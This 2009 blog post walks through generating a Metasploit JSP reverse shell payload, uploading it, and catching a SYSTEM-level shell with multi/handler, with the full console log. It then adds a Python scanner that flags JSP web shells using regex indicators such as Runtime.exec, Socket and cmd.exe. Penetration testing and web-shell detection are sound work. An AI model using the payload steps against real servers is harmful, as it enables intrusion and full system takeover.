Metasploit JSP Shells


Stephen Fewer has pushed up a JSP reverse shell and a JSP bind shell.

http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java

I'm not sure of all the ways to use them, but the easiest way is to just output the shell to raw and upload it to a web server; for an example with an exploit, check out the Adobe RoboHelp exploit.

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb


yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jsp

From there you can set up your multi/handler, browse to the uploaded page at webpath/blah.jsp, and grab your shell.

yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole
=[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 432 exploits - 261 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 222 aux

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > info

       Name: Generic Payload Handler
    Version: 6558
   Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  hdm

Available targets:
  Id  Name
  --  ----
  0   Wildcard Target

Payload information:
  Space: 100000
  Avoid: 0 characters

Description:
  This module is a stub that provides all of the features of the
  Metasploit payload system to exploits that have been launched
  outside of the framework.

msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.10.1     yes       The local address
   LPORT  4444             yes       The local port
   SHELL  cmd.exe          yes       The system shell to use.

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started reverse handler
[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\system

C:\ColdFusion8\runtime\bin>exit
exit
[*] Command shell session 1 closed.
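The session above also shows the defender's side of this: the shell comes back as nt authority\system from C:\ColdFusion8\runtime\bin, because the ColdFusion service itself runs as SYSTEM, so any JSP that lands in its web root runs with full privileges. A JSP shell of the kind Stephen Fewer pushed has a recognisable shape in source (a process spawn plus socket plumbing), and that shape can be hunted for. The scanner below is an added example, not code from this post or from Metasploit: it walks a web root, scores each JSP file against a constructed indicator list, and reports files at or above a threshold. The indicator regexes, weights, threshold and the three sample pages it writes into a temporary directory are all assumptions of the example.

```python
"""Heuristic scanner for JSP web shells left in a web root.

Added example, not part of the original post or of Metasploit. The indicator
list and weights are a constructed scheme; tune them to your environment.
"""
import os
import re
import tempfile
from dataclasses import dataclass

# (regex, weight, label): constructs a reverse or bind JSP shell cannot do without.
INDICATORS = [
    (re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\("), 5, "Runtime.exec"),
    (re.compile(r"new\s+ProcessBuilder\s*\("), 5, "ProcessBuilder"),
    (re.compile(r"new\s+(?:java\.net\.)?Socket\s*\("), 4, "outbound Socket (reverse shell shape)"),
    (re.compile(r"new\s+(?:java\.net\.)?ServerSocket\s*\("), 4, "listening ServerSocket (bind shell shape)"),
    (re.compile(r"request\.getParameter\s*\([^)]*\)[^;]*exec"), 3, "request parameter passed to exec"),
    (re.compile(r"\bcmd\.exe\b|/bin/(?:ba)?sh\b"), 3, "system shell named in source"),
    (re.compile(r"getInputStream\(\)|getOutputStream\(\)"), 1, "process/socket stream plumbing"),
]
JSP_EXTENSIONS = (".jsp", ".jspx", ".jspf")
DEFAULT_THRESHOLD = 5  # a single process-spawning primitive is enough to warrant review


@dataclass
class Finding:
    path: str
    score: int
    labels: list


def score_source(text):
    """Return (score, labels) for one JSP source; each indicator counts once."""
    hits = [(weight, label) for rx, weight, label in INDICATORS if rx.search(text)]
    return sum(w for w, _ in hits), [label for _, label in hits]


def scan_webroot(root, threshold=DEFAULT_THRESHOLD):
    """Walk a web root and return findings at or above threshold, highest score first."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(JSP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, labels = score_source(fh.read())
            if score >= threshold:
                findings.append(Finding(path, score, labels))
    return sorted(findings, key=lambda f: f.score, reverse=True)


# Constructed sample pages. The "suspect" one only has the *shape* of a reverse
# shell (placeholders, no copy loop); it is not a working shell.
BENIGN_JSP = """<%@ page contentType="text/html" %>
<html><body>
<% String name = request.getParameter("name"); %>
<p>Hello, <%= name == null ? "guest" : name %></p>
</body></html>
"""

LOG_VIEWER_JSP = """<%@ page import="java.io.*" %>
<%
  // constructed benign page that reads the request body: one weak indicator only
  InputStream in = request.getInputStream();
  int first = in.read();
%>
"""

SUSPECT_JSP = """<%@ page import="java.io.*,java.net.*" %>
<%
  // constructed fragment with the shape of a reverse shell: not functional
  Socket sock = new Socket(HOST_PLACEHOLDER, PORT_PLACEHOLDER);
  Process proc = Runtime.getRuntime().exec("cmd.exe");
  InputStream pin = proc.getInputStream();
  OutputStream sout = sock.getOutputStream();
  /* ... stream copy loop omitted ... */
%>
"""


def write_samples(root):
    """Drop the three constructed pages into a fake web root (one in an uploads dir)."""
    os.makedirs(os.path.join(root, "uploads"), exist_ok=True)
    for rel, body in (("index.jsp", BENIGN_JSP),
                      ("logview.jsp", LOG_VIEWER_JSP),
                      (os.path.join("uploads", "upload.jsp"), SUSPECT_JSP)):
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Build the fake web root, scan it, and return the findings."""
    root = tempfile.mkdtemp(prefix="jsp-scan-")
    write_samples(root)
    return scan_webroot(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.score:3d}  {f.path}  ({', '.join(f.labels)})")
```

Only uploads/upload.jsp crosses the threshold (score 13: Runtime.exec, Socket, cmd.exe, stream plumbing); index.jsp scores 0 and logview.jsp scores 1 for its lone getInputStream() call, which is why a weighted sum rather than a single keyword match is used. In production, pair this with a baseline of known-good file hashes so new or modified JSP files stand out regardless of content, and with egress monitoring on the web server host, since the reverse shell's defining behaviour is the server process opening an outbound TCP connection to an arbitrary port.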



Written on Thursday, 22 October 2009 08:55 by GSO